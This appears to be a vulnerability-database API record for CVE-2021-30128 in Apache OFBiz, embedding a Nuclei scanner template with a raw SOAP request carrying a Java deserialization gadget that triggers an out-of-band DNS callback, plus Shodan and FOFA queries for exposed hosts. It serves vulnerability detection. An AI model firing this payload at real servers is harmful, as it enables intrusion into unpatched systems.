{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-30128/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-30128/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-30128/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-30128/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-30128/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-30128"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-30128"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2021/CVE-2021-30128.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2021-30128\n\ninfo:\n  name: Apache OFBiz <17.12.07 - Arbitrary Code Execution\n  author: For3stCo1d\n  severity: critical\n  description: Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n  remediation: |\n    Upgrade Apache OFBiz to version 17.12.07 or later to mitigate this vulnerability.\n  reference:\n    - https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E\n    - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E\n    - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-30128\n    - http://www.openwall.com/lists/oss-security/2021/04/27/5\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-30128\n    cwe-id: CWE-502\n    epss-score: 0.81209\n    epss-percentile: 0.99617\n    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: apache\n    product: ofbiz\n    shodan-query:\n      - http.html:\"ofbiz\"\n      - ofbiz.visitor=\n    fofa-query:\n      - app=\"Apache_OFBiz\"\n      - body=\"ofbiz\"\n      - app=\"apache_ofbiz\"\n  tags: cve2021,cve,apache,ofbiz,deserialization,rce,vuln,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /webtools/control/SOAPService HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: text/xml\n\n        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://ofbiz.apache.org/service/\">\n          <soapenv:Header/>\n            <soapenv:Body>\n              <ser>\n                <map-Map>\n                  <map-Entry>\n                    <map-Key>\n                      <cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</cus-obj>\n                    </map-Key>\n                  <map-Value>\n                <std-String/>\n                </map-Value>\n                </map-Entry>\n              </map-Map>\n              </ser>\n            </soapenv:Body>\n        </soapenv:Envelope>\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n\n      - type: word\n        part: body\n        words:\n          - 'value=\"errorMessage\"'\n# digest: 4a0a00473045022100bb034603a4560f17a16844ff4787f96e2786eb8836b05aca5e5986591074a03b02205f39a3b00d57848cc59fd9b2d31d16f0ac0f0534db72da86c8873322b2be0dd7:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2021-30128"
}